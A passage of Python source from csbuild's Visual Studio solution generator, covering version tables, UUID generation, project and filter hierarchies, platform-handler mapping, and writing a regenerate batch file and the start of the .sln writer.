\"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: internal\n\t:synopsis: Internal functionality for the Visual Studio solution generator.\n\n.. 
moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport codecs\nimport contextlib\nimport csbuild\nimport hashlib\nimport os\nimport sys\nimport tempfile\nimport uuid\n\nfrom csbuild import log\nfrom csbuild._utils import GetCommandLineString, PlatformString\n\nfrom xml.etree import ElementTree as ET\nfrom xml.dom import minidom\n\nfrom ..platform_handlers import VsInstallInfo\nfrom ..platform_handlers.android import VsNsightTegraPlatformHandler\nfrom ..platform_handlers.ps3 import VsPs3PlatformHandler\nfrom ..platform_handlers.ps4 import VsPs4PlatformHandler\nfrom ..platform_handlers.ps5 import VsPs5PlatformHandler\nfrom ..platform_handlers.psvita import VsPsVitaPlatformHandler\nfrom ..platform_handlers.windows import VsWindowsX86PlatformHandler, VsWindowsX64PlatformHandler\n\nfrom ....assemblers.gcc_assembler import GccAssembler\nfrom ....assemblers.msvc_assembler import MsvcAssembler\n\nfrom ....cpp_compilers.cpp_compiler_base import CppCompilerBase\n\nfrom ....java_compilers.java_compiler_base import JavaCompilerBase\n\n\nclass Version(object):\n\t\"\"\"\n\tEnum values representing Visual Studio versions.\n\t\"\"\"\n\tVs2010 = \"2010\"\n\tVs2012 = \"2012\"\n\tVs2013 = \"2013\"\n\tVs2015 = \"2015\"\n\tVs2017 = \"2017\"\n\tVs2019 = \"2019\"\n\tVs2022 = \"2022\"\n\n\nFILE_FORMAT_VERSION_INFO = {\n\tVersion.Vs2010: VsInstallInfo(\"Visual Studio 2010\", \"11.00\", \"2010\", \"v100\"),\n\tVersion.Vs2012: VsInstallInfo(\"Visual Studio 2012\", \"12.00\", \"2012\", \"v110\"),\n\tVersion.Vs2013: VsInstallInfo(\"Visual Studio 2013\", \"12.00\", \"2013\", \"v120\"),\n\tVersion.Vs2015: VsInstallInfo(\"Visual Studio 2015\", \"12.00\", \"14\", \"v140\"),\n\tVersion.Vs2017: VsInstallInfo(\"Visual Studio 2017\", \"12.00\", \"15\", \"v141\"),\n\tVersion.Vs2019: VsInstallInfo(\"Visual Studio 2019\", \"12.00\", \"Version 16\", \"v142\"),\n\tVersion.Vs2022: VsInstallInfo(\"Visual Studio 2022\", \"12.00\", \"Version 17\", \"v143\"),\n}\n\nCPP_SOURCE_FILE_EXTENSIONS = CppCompilerBase.inputFiles\nCPP_HEADER_FILE_EXTENSIONS = { \".h\", \".hh\", \".hpp\", \".hxx\" }\nOBJC_SOURCE_FILE_EXTENSIONS = { \".m\", \".mm\" }\nHLSL_SOURCE_FILE_EXTENSIONS = { \".hlsl\" }\nHLSL_HEADER_FILE_EXTENSIONS = { \".hlsli\" }\nPYTHON_FILE_EXTENSIONS = { \".py\" }\nBATCH_FILE_EXTENSIONS = { \".bat\", \".cmd\" }\n\nASM_FILE_EXTENSIONS = GccAssembler.inputFiles | MsvcAssembler.inputFiles\n\nMISC_FILE_EXTENSIONS = { \".inl\", \".inc\", \".def\" } \\\n\t| JavaCompilerBase.inputGroups\n\nALL_FILE_EXTENSIONS = CPP_SOURCE_FILE_EXTENSIONS \\\n\t| CPP_HEADER_FILE_EXTENSIONS \\\n\t| OBJC_SOURCE_FILE_EXTENSIONS \\\n\t| HLSL_SOURCE_FILE_EXTENSIONS \\\n\t| HLSL_HEADER_FILE_EXTENSIONS \\\n\t| ASM_FILE_EXTENSIONS \\\n\t| PYTHON_FILE_EXTENSIONS \\\n\t| BATCH_FILE_EXTENSIONS \\\n\t| MISC_FILE_EXTENSIONS\n\n# Switch for toggling the project folders separating files by their extensions.\nENABLE_FILE_TYPE_FOLDERS = False\n\n# Global dictionary of generated UUIDs for Visual Studio projects. This is needed to make sure there are no\n# duplicates when generating new UUIDs.\nUUID_TRACKER = {}\n\n# Keep track of the registered platform handlers.\nPLATFORM_HANDLERS = {}\n\n# Collection of all valid build specs used by input project generators. 
This will be pruned against\n# registered platform handlers.\nBUILD_SPECS = []\n\n# Absolute path to the main makefile that invoked csbuild.\nMAKEFILE_PATH = os.path.abspath(sys.modules[\"__main__\"].__file__)\n\n# Absolute path to the \"regenerate solution\" batch file. This will be filled in when the solution generator is run.\nREGEN_FILE_PATH = \"\"\n\n_createRootXmlNode = ET.Element\n_addXmlNode = ET.SubElement\n\ndef _makeXmlCommentNode(parentXmlNode, text):\n\tcomment = ET.Comment(text)\n\tparentXmlNode.append(comment)\n\treturn comment\n\ndef _generateUuid(name):\n\tglobal UUID_TRACKER\n\n\tif not name:\n\t\treturn \"{{{}}}\".format(str(uuid.UUID(int=0)))\n\n\tname = PlatformString(name if name else \"\")\n\n\tnameIndex = 0\n\tnameToHash = name\n\n\t# Keep generating new UUIDs until we've found one that isn't already in use. This is only useful in cases\n\t# where we have a pool of objects and each one needs to be guaranteed to have a UUID that doesn't collide\n\t# with any other object in the same pool. Though, because of the way UUIDs work, having a collision should\n\t# be extremely rare anyway.\n\twhile True:\n\t\tnewUuid = uuid.uuid5( uuid.NAMESPACE_OID, nameToHash )\n\t\tmappedName = UUID_TRACKER.get(newUuid, None)\n\n\t\tif not mappedName or mappedName == nameToHash:\n\t\t\tif not mappedName:\n\t\t\t\tUUID_TRACKER.update({ newUuid: name })\n\n\t\t\treturn \"{{{}}}\".format(str(newUuid)).upper()\n\n\t\t# Name collision! The easy solution here is to slightly modify the name in a predictable way.\n\t\tnameToHash = \"{}{}\".format( name, nameIndex )\n\t\tnameIndex += 1\n\n\ndef _getVsConfigName(buildSpec):\n\t# Visual Studio can be exceptionally picky about configuration names. For instance, if your build script\n\t# has the \"debug\" target, you may run into problems with Visual Studio showing that alongside its own\n\t# \"Debug\" configuration, which it may have decided to silently add alongside your own. The solution is to\n\t# just put the configurations in a format it expects (first letter upper case). 
That way, it will see \"Debug\"\n\t# already there and won't try to silently 'fix' that up for you.\n\treturn buildSpec[2].capitalize()\n\n\ndef _createBuildSpec(generator):\n\treturn generator.projectData.toolchainName \\\n\t\t, generator.projectData.architectureName \\\n\t\t, generator.projectData.targetName\n\n\ndef _createVsPlatform(buildSpec, platformHandler):\n\treturn \"{}|{}\".format(_getVsConfigName(buildSpec), platformHandler.GetVisualStudioPlatformName())\n\n\ndef _constructRelPath(filePath, rootPath):\n\ttry:\n\t\t# Attempt to construct the relative path from the root.\n\t\tnewPath = os.path.relpath(filePath, rootPath)\n\n\texcept:\n\t\t# If that fails, return the input path as-is.\n\t\tnewPath = filePath\n\n\treturn newPath\n\n\ndef _getItemRootFolderName(filePath):\n\tfileExt = os.path.splitext(filePath)[1]\n\tif fileExt in CPP_SOURCE_FILE_EXTENSIONS:\n\t\treturn \"C/C++ source files\"\n\tif fileExt in CPP_HEADER_FILE_EXTENSIONS:\n\t\treturn \"C/C++ header files\"\n\tif fileExt in ASM_FILE_EXTENSIONS:\n\t\treturn \"Assembly source files\"\n\tif fileExt in HLSL_SOURCE_FILE_EXTENSIONS:\n\t\treturn \"Shader source files\"\n\tif fileExt in HLSL_HEADER_FILE_EXTENSIONS:\n\t\treturn \"Shader header files\"\n\tif fileExt in PYTHON_FILE_EXTENSIONS:\n\t\treturn \"Python source files\"\n\tif fileExt in BATCH_FILE_EXTENSIONS:\n\t\treturn \"Batch source files\"\n\tif not fileExt:\n\t\treturn \"Unknown files\"\n\n\treturn \"{} files\".format(fileExt)\n\n\ndef _getSourceFileProjectStructure(projWorkingPath, projExtraPaths, filePath, separateFileExtensions):\n\tprojStructure = []\n\n\t# The first item should be the file type folder name if separating by file extension.\n\tif separateFileExtensions:\n\t\tfolderName = _getItemRootFolderName(filePath)\n\n\t\tprojStructure.append(folderName)\n\n\trelativePath = None\n\n\ttempPath = _constructRelPath(filePath, projWorkingPath)\n\n\tif tempPath != filePath:\n\t\t# The input file path is under the project's working directory.\n\t\trelativePath = tempPath\n\n\telse:\n\t\t# The input file path is outside the project's working directory.\n\t\tprojStructure.append(\"[External]\")\n\n\t\t# Search each extra source directory in the project to see if the input file path is under one of them.\n\t\tfor extraPath in projExtraPaths:\n\t\t\ttempPath = _constructRelPath(filePath, extraPath)\n\n\t\t\tif tempPath != filePath:\n\t\t\t\t# Found the extra source directory that contains the input file path.\n\t\t\t\trelativePath = tempPath\n\t\t\t\trootPath = filePath[:-(len(relativePath) + 1)]\n\t\t\t\tbaseFolderName = os.path.basename(rootPath)\n\n\t\t\t\t# For better organization, add the input file to a special directory that hopefully identifies it.\n\t\t\t\tprojStructure.append(baseFolderName)\n\t\t\t\tbreak\n\n\tif not relativePath:\n\t\t# The input file was not found under any source directory, so it'll just be added by itself.\n\t\tprojStructure.append(os.path.basename(filePath))\n\n\telse:\n\t\t# Take the relative path and split it into segments to form the remaining directories for the project structure.\n\t\trelativePath = relativePath.replace(\"\\\\\", \"/\")\n\t\tpathSegments = relativePath.split(\"/\")\n\n\t\tprojStructure.extend(pathSegments)\n\n\treturn projStructure\n
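\n\n# Editorial note: an illustrative trace of the function above, with hypothetical paths: given\n# projWorkingPath=\"C:/proj\", filePath=\"C:/proj/src/a.cpp\", and separateFileExtensions=True,\n# the returned structure would be [\"C/C++ source files\", \"src\", \"a.cpp\"].\n\n\nclass VsProjectType(object):\n\t\"\"\"\n\tEnum describing project types.\n\t\"\"\"\n\tRoot = \"root\"\n\tStandard = \"standard\"\n\tFilter = \"filter\"\n\n\nclass VsProjectSubType(object):\n\t\"\"\"\n\tEnum describing project sub-types.\n\t\"\"\"\n\tNormal = \"normal\"\n\tBuildAll = 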
\"build_all\"\n\tRegen = \"regen\"\n\n\nclass VsProjectItemType(object):\n\t\"\"\"\n\tEnum describing project item types.\n\t\"\"\"\n\tFile = \"file\"\n\tFolder = \"folder\"\n\n\nclass VsProjectItem(object):\n\t\"\"\"\n\tContainer for items owned by Visual Studio projects.\n\t\"\"\"\n\tdef __init__(self, name, dirPath, itemType, parentSegments):\n\t\tglobal CPP_SOURCE_FILE_EXTENSIONS\n\t\tglobal CPP_HEADER_FILE_EXTENSIONS\n\n\t\tself.name = name if name else \"\"\n\t\tself.dirPath = dirPath if dirPath else \"\"\n\t\tself.guid = _generateUuid(os.path.join(self.dirPath, self.name))\n\t\tself.itemType = itemType\n\t\tself.supportedBuildSpecs = set()\n\t\tself.children = {}\n\t\tself.parentSegments = parentSegments if parentSegments else []\n\t\tself.tag = None\n\n\t\tif self.itemType == VsProjectItemType.File:\n\t\t\tfileExt = os.path.splitext(self.name)[1]\n\t\t\tif fileExt in CPP_SOURCE_FILE_EXTENSIONS:\n\t\t\t\tself.tag = \"ClCompile\"\n\t\t\telif fileExt in CPP_HEADER_FILE_EXTENSIONS:\n\t\t\t\tself.tag = \"ClInclude\"\n\t\t\telif fileExt in HLSL_SOURCE_FILE_EXTENSIONS:\n\t\t\t\tself.tag = \"FxCompile\"\n\t\t\telse:\n\t\t\t\tself.tag = \"None\"\n\n\tdef GetSegmentPath(self):\n\t\t\"\"\"\n\t\tGet the item parent segments as a path string.\n\n\t\t:return: Parent segment path string.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn os.sep.join(self.parentSegments)\n\n\nclass VsProject(object):\n\t\"\"\"\n\tContainer for project-level data in Visual Studio.\n\t\"\"\"\n\tdef __init__(self, name, relFilePath, projType):\n\t\tmakeFileName = os.path.basename(MAKEFILE_PATH)\n\t\tmakeFileItem = VsProjectItem(makeFileName, os.path.dirname(MAKEFILE_PATH), VsProjectItemType.File, [])\n\t\tmakeFileItem.supportedBuildSpecs = set(BUILD_SPECS)\n\n\t\tself.name = name\n\t\tself.relFilePath = relFilePath\n\t\tself.projType = projType\n\t\tself.subType = VsProjectSubType.Normal\n\t\tself.guid = _generateUuid(name)\n\t\tself.children = {}\n\t\tself.items = { makeFileItem.name: makeFileItem }\n\t\tself.supportedBuildSpecs = set()\n\t\tself.platformGenerator = {}\n\t\tself.platformOutputType = {}\n\t\tself.platformOutputName = {}\n\t\tself.platformOutputDirPath = {}\n\t\tself.platformIntermediateDirPath = {}\n\t\tself.platformIncludePaths = {}\n\t\tself.platformDefines = {}\n\t\tself.platformCxxLanguageStandard = {}\n\n\t\tself.slnTypeGuid = {\n\t\t\tVsProjectType.Standard: \"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\",\n\t\t\tVsProjectType.Filter: \"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\",\n\t\t}.get(self.projType, \"{UNKNOWN}\")\n\n\tdef GetVcxProjFilePath(self, extraExtension=\"\"):\n\t\t\"\"\"\n\t\tGet the relative file path to this project's vcxproj file.\n\n\t\t:param extraExtension: Extra part to add onto the file extension (allows us to construct \".vcxproj.filters\" and \".vcxproj.user\" files.\n\t\t:type extraExtension: str\n\n\t\t:return: Relative vcxproj file path.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn os.path.join(\"vsproj\", self.relFilePath, \"{}.vcxproj{}\".format(self.name, extraExtension))\n\n\tdef MergeProjectData(self, buildSpec, generator):\n\t\t\"\"\"\n\t\tMerge data for a given build spec and generator into the project.\n\n\t\t:param buildSpec: Build spec matching the input generator.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param generator: Generator containing the data that needs to be merged into the project.\n\t\t:type generator: csbuild.tools.project_generators.visual_studio.VsProjectGenerator or None\n\t\t\"\"\"\n\t\tglobal ENABLE_FILE_TYPE_FOLDERS\n\n\t\tif self.projType == 
VsProjectType.Standard:\n\n\t\t\t# Register support for the input build spec.\n\t\t\tif buildSpec not in self.supportedBuildSpecs:\n\t\t\t\tself.supportedBuildSpecs.add(buildSpec)\n\t\t\t\tself.platformOutputType.update({ buildSpec: csbuild.ProjectType.Application })\n\t\t\t\tself.platformOutputName.update({ buildSpec: \"\" })\n\t\t\t\tself.platformOutputDirPath.update({ buildSpec: \"\" })\n\t\t\t\tself.platformIntermediateDirPath.update({ buildSpec: \"\" })\n\t\t\t\tself.platformIncludePaths.update({ buildSpec: [] })\n\t\t\t\tself.platformDefines.update({ buildSpec: [] })\n\t\t\t\tself.platformCxxLanguageStandard.update({ buildSpec: None })\n\n\t\t\t# Merge the data from the generator.\n\t\t\tif generator:\n\t\t\t\tself.platformGenerator[buildSpec] = generator\n\t\t\t\tself.platformIncludePaths[buildSpec].extend(list(generator.includeDirectories))\n\t\t\t\tself.platformDefines[buildSpec].extend(list(generator.defines))\n\t\t\t\tself.platformCxxLanguageStandard[buildSpec] = generator.cxxLanguageStandard\n\n\t\t\t\tprojectData = generator.projectData\n\n\t\t\t\tself.platformOutputType[buildSpec] = projectData.projectType\n\t\t\t\tself.platformOutputName[buildSpec] = projectData.outputName\n\t\t\t\tself.platformOutputDirPath[buildSpec] = os.path.abspath(projectData.outputDir)\n\t\t\t\tself.platformIntermediateDirPath[buildSpec] = os.path.abspath(projectData.intermediateDir)\n\n\t\t\t\t# Add items for each source file in the project.\n\t\t\t\tfor filePath in generator.sourceFiles:\n\t\t\t\t\tfileStructure = _getSourceFileProjectStructure(projectData.workingDirectory, projectData.sourceDirs, filePath, ENABLE_FILE_TYPE_FOLDERS)\n\t\t\t\t\tparentMap = self.items\n\n\t\t\t\t\t# Get the file item name, then remove it from the project structure.\n\t\t\t\t\tfileItemName = fileStructure[-1]\n\t\t\t\t\tfileStructure = fileStructure[:-1]\n\t\t\t\t\tparentSegments = []\n\n\t\t\t\t\t# Build the hierarchy of folder items for the current file.\n\t\t\t\t\tfor segment in fileStructure:\n\t\t\t\t\t\tif segment not in parentMap:\n\t\t\t\t\t\t\tparentMap.update({ segment: VsProjectItem(segment, os.sep.join(parentSegments), VsProjectItemType.Folder, parentSegments) })\n\n\t\t\t\t\t\tparentMap = parentMap[segment].children\n\n\t\t\t\t\t\t# Keep track of each segment along the way since each item (including the folder items)\n\t\t\t\t\t\t# needs to know its parent segments when the vcxproj.filters file is generated.\n\t\t\t\t\t\tparentSegments.append(segment)\n\n\t\t\t\t\tif fileItemName not in parentMap:\n\t\t\t\t\t\t# The current file item is new, so map it under the parent item.\n\t\t\t\t\t\tfileItem = VsProjectItem(fileItemName, os.path.dirname(filePath), VsProjectItemType.File, parentSegments)\n\n\t\t\t\t\t\tparentMap.update({ fileItemName: fileItem })\n\n\t\t\t\t\telse:\n\t\t\t\t\t\t# The current file item already exists, so get the original object for its mapping.\n\t\t\t\t\t\tfileItem = parentMap[fileItemName]\n\n\t\t\t\t\t# Update the set of supported platforms for the current file item.\n\t\t\t\t\tfileItem.supportedBuildSpecs.add(buildSpec)\n\n\nclass VsFileProxy(object):\n\t\"\"\"\n\tHandler for copying a temp file to its final location.\n\t\"\"\"\n\tdef __init__(self, realFilePath, tempFilePath):\n\t\tself.realFilePath = realFilePath\n\t\tself.tempFilePath = tempFilePath\n\n\tdef Check(self):\n\t\t\"\"\"\n\t\tCheck the temp file to see if it differs from the output file, then copy if they don't match.\n\t\t\"\"\"\n\t\toutDirPath = os.path.dirname(self.realFilePath)\n\n\t\t# Create the output 
directory if it doesn't exist.\n\t\tif not os.access(outDirPath, os.F_OK):\n\t\t\tos.makedirs(outDirPath)\n\n\t\t# Open the input file and get a hash of its data.\n\t\twith open(self.tempFilePath, \"rb\") as inputFile:\n\t\t\tinputFileData = inputFile.read()\n\t\t\tinputHash = hashlib.md5()\n\n\t\t\tinputHash.update(inputFileData)\n\n\t\t\tinputHash = inputHash.hexdigest()\n\n\t\tif os.access(self.realFilePath, os.F_OK):\n\t\t\t# Open the output file and get a hash of its data.\n\t\t\twith open(self.realFilePath, \"rb\") as outputFile:\n\t\t\t\toutputFileData = outputFile.read()\n\t\t\t\toutputHash = hashlib.md5()\n\n\t\t\t\toutputHash.update(outputFileData)\n\n\t\t\t\toutputHash = outputHash.hexdigest()\n\n\t\telse:\n\t\t\t# The output file doesn't exist, so use an empty string to stand in for the hash.\n\t\t\toutputHash = \"\"\n\n\t\t# Do a consistency check using the MD5 hashes of the input and output files to determine if we\n\t\t# need to copy the data to the output file.\n\t\tif inputHash != outputHash:\n\t\t\tlog.Build(\"[WRITING] {}\".format(self.realFilePath))\n\n\t\t\twith open(self.realFilePath, \"wb\") as outputFile:\n\t\t\t\toutputFile.write(inputFileData)\n\t\t\t\toutputFile.flush()\n\t\t\t\tos.fsync(outputFile.fileno())\n\n\t\telse:\n\t\t\tlog.Build(\"[UP-TO-DATE] {}\".format(self.realFilePath))\n\n\t\tos.remove(self.tempFilePath)\n\n\ndef _evaluatePlatforms(generators, vsInstallInfo):\n\tglobal PLATFORM_HANDLERS\n\tglobal BUILD_SPECS\n\n\tif not PLATFORM_HANDLERS:\n\t\t# No platform handlers have been registered by the user, so we can add reasonable defaults here.\n\t\tPLATFORM_HANDLERS.update({\n\t\t\t(\"android-gcc\", \"arm\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-gcc\", \"arm64\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-gcc\", \"x86\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-gcc\", \"x64\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-gcc\", \"mips\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-gcc\", \"mips64\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-clang\", \"arm\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-clang\", \"arm64\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-clang\", \"x86\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-clang\", \"x64\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-clang\", \"mips\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"android-clang\", \"mips64\", ()): VsNsightTegraPlatformHandler,\n\t\t\t(\"msvc\", \"x86\", ()): VsWindowsX86PlatformHandler,\n\t\t\t(\"msvc\", \"x64\", ()): VsWindowsX64PlatformHandler,\n\t\t\t(\"ps3\", \"cell\", ()): VsPs3PlatformHandler,\n\t\t\t(\"ps4\", \"x64\", ()): VsPs4PlatformHandler,\n\t\t\t(\"ps5\", \"x64\", ()): VsPs5PlatformHandler,\n\t\t\t(\"psvita\", \"arm\", ()): VsPsVitaPlatformHandler,\n\t\t})\n
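\n\t\t# Editorial note: each key above is a build-spec tuple of (toolchainName, architectureName, targetConfigs);\n\t\t# an empty targetConfigs tuple means the handler applies to every discovered target, per the loop below.\n\n\t# Find all specs used by the generators.\n\tallFoundSpecs = { _createBuildSpec(gen) for gen in generators }\n\tallFoundTargets = sorted(list({ spec[2] for spec in allFoundSpecs }))\n\ttempHandlers = {}\n\n\t# Instantiate each registered platform handler.\n\tfor key, cls in PLATFORM_HANDLERS.items():\n\t\t# Convert the key to a list so we can modify it if necessary.\n\t\tkey = list(key)\n\n\t\tif not key[2]:\n\t\t\t# If there were no configs specified by the user, that is an indication to use all known configs.\n\t\t\tkey[2] = allFoundTargets\n\t\telse:\n\t\t\t# Of the configs provided by the user, trim them all down to only those we know about.\n\t\t\tkey[2] = [x for x in key[2] if x in 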
allFoundTargets]\n\n\t\tallKeyConfigs = key[2]\n\n\t\t# Split out the configs so each one produces a different key. This will make dictionary lookups easier.\n\t\tfor config in allKeyConfigs:\n\t\t\tkey = (key[0], key[1], config)\n\t\t\ttempHandlers.update({ key: cls })\n\n\tsortedHandlerKeys = sorted(tempHandlers.keys())\n\n\tlog.Info(\"Found build specs in available projects: {}\".format(sorted(allFoundSpecs)))\n\tlog.Info(\"Build specs mapped to platform handlers: {}\".format(sortedHandlerKeys))\n\n\t# We have all the handlers stored in a temporary dictionary so we can refill them globally as we validate them.\n\tPLATFORM_HANDLERS = {}\n\n\tfoundVsPlatforms = set()\n\trejectedBuildSpecs = set()\n\n\t# Validate the platform handlers to make sure none of them overlap.\n\tfor key in sortedHandlerKeys:\n\t\t# Do not include specs that are not common to the available generators.\n\t\tif key in allFoundSpecs:\n\t\t\tcls = tempHandlers[key]\n\t\t\tvsPlatform = _createVsPlatform(key, cls)\n\t\t\tif vsPlatform in foundVsPlatforms:\n\t\t\t\trejectedBuildSpecs.add(key)\n\t\t\telse:\n\t\t\t\tfoundVsPlatforms.add(vsPlatform)\n\t\t\t\tPLATFORM_HANDLERS.update({ key: cls(key, vsInstallInfo) })\n\n\tif rejectedBuildSpecs:\n\t\tlog.Warn(\"Rejecting the following build specs since they are registered to overlapping Visual Studio platforms: {}\".format(sorted(rejectedBuildSpecs)))\n\n\t# Prune the generators down to a list with only supported platforms.\n\tprunedGenerators = [x for x in generators if _createBuildSpec(x) in PLATFORM_HANDLERS]\n\n\tfoundBuildSpecs = set()\n\n\t# Compile a list of all remaining build specs out of the pruned generators.\n\tfor gen in prunedGenerators:\n\t\tfoundBuildSpecs.add(_createBuildSpec(gen))\n\n\tBUILD_SPECS = sorted(foundBuildSpecs)\n\n\tif PLATFORM_HANDLERS:\n\t\tlog.Info(\"Using Visual Studio platforms: {}\".format(\", \".join(sorted({ handler.GetVisualStudioPlatformName() for _, handler in PLATFORM_HANDLERS.items() }))))\n\n\treturn prunedGenerators\n\n\ndef _createRegenerateBatchFile(outputRootPath):\n\tglobal MAKEFILE_PATH\n\tglobal REGEN_FILE_PATH\n\n\toutputFilePath = os.path.join(outputRootPath, \"regenerate_solution.bat\")\n\tpythonExePath = os.path.normcase(sys.executable)\n\tmakefilePath = _constructRelPath(MAKEFILE_PATH, outputRootPath)\n\tcmdLine = GetCommandLineString()\n\n\ttmpFd, tempFilePath = tempfile.mkstemp(prefix=\"vs_regen_\")\n\n\t# Write the batch file data.\n\twith os.fdopen(tmpFd, \"w\") as f:\n\t\twriteLineToFile = lambda text: f.write(\"{}\\n\".format(text))\n\n\t\twriteLineToFile(\"@echo off\")\n\t\twriteLineToFile(\"SETLOCAL\")\n\t\twriteLineToFile(\"PUSHD %~dp0\")\n\t\twriteLineToFile(\"\\\"{}\\\" \\\"{}\\\" {}\".format(pythonExePath, makefilePath, cmdLine))\n\t\twriteLineToFile(\"POPD\")\n\n\t\tf.flush()\n\t\tos.fsync(f.fileno())\n\n\tREGEN_FILE_PATH = outputFilePath\n\tproxy = VsFileProxy(REGEN_FILE_PATH, tempFilePath)\n\n\tproxy.Check()\n\n\ndef _buildProjectHierarchy(generators):\n\tglobal BUILD_SPECS\n\n\trootProject = VsProject(None, \"\", VsProjectType.Root)\n\tbuildAllProject = VsProject(\"(BUILD_ALL)\", \"\", VsProjectType.Standard)\n\tregenProject = VsProject(\"(REGENERATE_SOLUTION)\", \"\", VsProjectType.Standard)\n\n\t# Set the default project special types so they can be identified.\n\tbuildAllProject.subType = VsProjectSubType.BuildAll\n\tregenProject.subType = VsProjectSubType.Regen\n\n\t# The default projects can be used with all build specs.\n\tfor buildSpec in BUILD_SPECS:\n\t\tbuildAllProject.MergeProjectData(buildSpec, 
None)\n\t\tregenProject.MergeProjectData(buildSpec, None)\n\n\t# Add the default projects to the hierarchy.\n\trootProject.children.update({\n\t\tbuildAllProject.name: buildAllProject,\n\t\tregenProject.name: regenProject,\n\t})\n\n\t# Parse the data from each project generator.\n\tfor gen in generators:\n\t\tbuildSpec = _createBuildSpec(gen)\n\t\tparent = rootProject\n\n\t\t# Find the appropriate parent project if this project is part of a group.\n\t\tfor segment in gen.groupSegments:\n\t\t\t# If the current segment in the group is not represented in the current parent's child project list yet,\n\t\t\t# create it and insert it.\n\t\t\tif segment not in parent.children:\n\t\t\t\tparent.children.update({ segment: VsProject(segment, os.path.join(parent.relFilePath, segment), VsProjectType.Filter) })\n\n\t\t\tparent = parent.children[segment]\n\n\t\tprojName = gen.projectData.name\n\n\t\tif projName not in parent.children:\n\t\t\t# The current project does not exist yet, so create it and map it as a child to the parent project.\n\t\t\tproj = VsProject(projName, parent.relFilePath, VsProjectType.Standard)\n\t\t\tparent.children.update({ projName: proj })\n\n\t\telse:\n\t\t\t# Get the existing project entry from the parent.\n\t\t\tproj = parent.children[projName]\n\n\t\t# Merge the generator's platform data into the project.\n\t\tproj.MergeProjectData(buildSpec, gen)\n\n\treturn rootProject\n\n\ndef _buildFlatProjectList(rootProject):\n\tflatProjects = []\n\tprojectStack = [rootProject]\n\n\t# Build a flat list of all projects and filters.\n\twhile projectStack:\n\t\tproject = projectStack.pop(0)\n\n\t\t# Add each child project to the stack.\n\t\tfor projKey in sorted(list(project.children), key=lambda x: x.lower()):\n\t\t\tchildProject = project.children[projKey]\n\n\t\t\tflatProjects.append(childProject)\n\t\t\tprojectStack.append(childProject)\n\n\treturn flatProjects\n\n\ndef _buildFlatProjectItemList(rootItems):\n\tflatProjectItems = []\n\tdummyRootItem = VsProjectItem(None, None, None, None)\n\titemStack = [dummyRootItem]\n\n\t# Assign the input items to the dummy root.\n\tdummyRootItem.children = rootItems\n\n\t# Build a flat list of all project items.\n\twhile itemStack:\n\t\titem = itemStack.pop(0)\n\n\t\t# Add each child item to the stack.\n\t\tfor projKey in sorted(list(item.children)):\n\t\t\tchildItem = item.children[projKey]\n\n\t\t\tflatProjectItems.append(childItem)\n\t\t\titemStack.append(childItem)\n\n\treturn flatProjectItems\n\n\ndef _writeSolutionFile(rootProject, outputRootPath, solutionName, vsInstallInfo):\n\tglobal PLATFORM_HANDLERS\n\tglobal BUILD_SPECS\n\n\tclass SolutionWriter(object): # pylint: disable=missing-docstring\n\t\tdef __init__(self, fileHandle):\n\t\t\tself.fileHandle = fileHandle\n\t\t\tself.indentation = 0\n\n\t\tdef Line(self, text): # pylint: disable=missing-docstring\n\t\t\tself.fileHandle.write("{}{}\r\n".format("\t" * self.indentation, text))\n\n\t\[email protected]\n\t\tdef Section(self, sectionName, headerSuffix): # pylint: disable=missing-docstring\n\t\t\tself.Line("{}{}".format(sectionName, headerSuffix))\n\n\t\t\tself.indentation += 1\n\n\t\t\ttry:\n\t\t\t\tyield\n\n\t\t\tfinally:\n\t\t\t\tself.indentation -= 1\n\n\t\t\t\tself.Line("End{}".format(sectionName))\n\n\trealFilePath = os.path.join(outputRootPath, "{}.sln".format(solutionName))\n\ttmpFd, tempFilePath = tempfile.mkstemp(prefix="vs_sln_")\n\n\t# Close the file since it needs to be re-opened with a specific encoding.\n\tos.close(tmpFd)\n
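# --- Editor-added illustration (not part of the original source; stand-in names are hypothetical) ---
# _buildFlatProjectList() and _buildFlatProjectItemList() above are breadth-first
# traversals: popping from the front of the list visits each level of the hierarchy
# before descending into the next, so siblings stay grouped in the flat output.
# A minimal, runnable sketch of the same idea using plain dicts:
def _flattenBreadthFirst(children):
	flat, queue = [], [children]
	while queue:
		level = queue.pop(0)
		for key in sorted(level, key=lambda x: x.lower()):
			flat.append(key)
			queue.append(level[key])
	return flat

assert _flattenBreadthFirst({ "Group": { "child": {} }, "app": {} }) == ["app", "Group", "child"]
# --- End editor-added illustration ---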
